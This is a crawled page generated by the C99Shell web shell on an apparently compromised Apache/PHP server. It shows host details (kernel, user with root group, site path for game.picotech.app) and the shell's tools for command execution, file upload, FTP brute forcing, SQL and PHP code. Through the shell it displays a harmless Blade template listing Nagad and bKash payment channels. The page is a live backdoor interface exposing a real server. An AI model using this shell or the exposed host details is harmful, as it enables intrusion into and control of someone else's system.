!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/resources/views/front/   drwxr-xr-x
Free 28.91 GB of 117.98 GB (24.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     payment_channels.blade.php (2.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('master.front')

@section('title')
    {{__('Payment Channels')}}
@endsection

@section('styleplugins')

@endsection

@section('content')
    <div class="container mt-5 pt-5 pb-5">
        <div class="row">
            <div class="col-12">
                <div class="conditions-herder">
                    <h1>Payment Channels</h1>
                </div>
                <div class="conditions-body">
                    <ul class="nav nav-pills mb-3 mx-lg-3" id="pills-tab" role="tablist">
                        <li class="nav-item" role="presentation">
                          <button class="nav-link active" id="pills-home-tab" data-bs-toggle="pill" data-bs-target="#pills-home" type="button" role="tab" aria-controls="pills-home" aria-selected="true">Wallet</button>
                        </li>
                      </ul>
                      <div class="tab-content" id="pills-tabContent">
                        <div class="tab-pane fade show active" id="pills-home" role="tabpanel" aria-labelledby="pills-home-tab">
                            <div class="payment-channel-list">
                                <div class="payment-channel-item">
                                    <div class="payment-channel-item-link text-center">
                                        <div class="payment-channel-item-link-top">
                                            <div class="payment-channel-item-link-top-icon">
                                                <img src="https://cdn.unipin.com/images/payment_channels/1680658005-Nagad%20(1).jpg" alt="">
                                            </div>
                                        </div>
                                        <div class="payment-channel-item-link-footer">Nagad</div>
                                    </div>
                                </div>
                                <div class="payment-channel-item">
                                    <div class="payment-channel-item-link text-center">
                                        <div class="payment-channel-item-link-top">
                                            <div class="payment-channel-item-link-top-icon">
                                                <img src="https://cdn.unipin.com/images/payment_channels/1678779200-1678182038-1650598923-354.png" alt="">
                                            </div>
                                        </div>
                                        <div class="payment-channel-item-link-footer">bKash</div>
                                    </div>
                                </div>
                            </div>
                        </div>
                      </div>
                </div>
            </div>
        </div>
    </div>
@endsection

@section('jsplugins')

@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--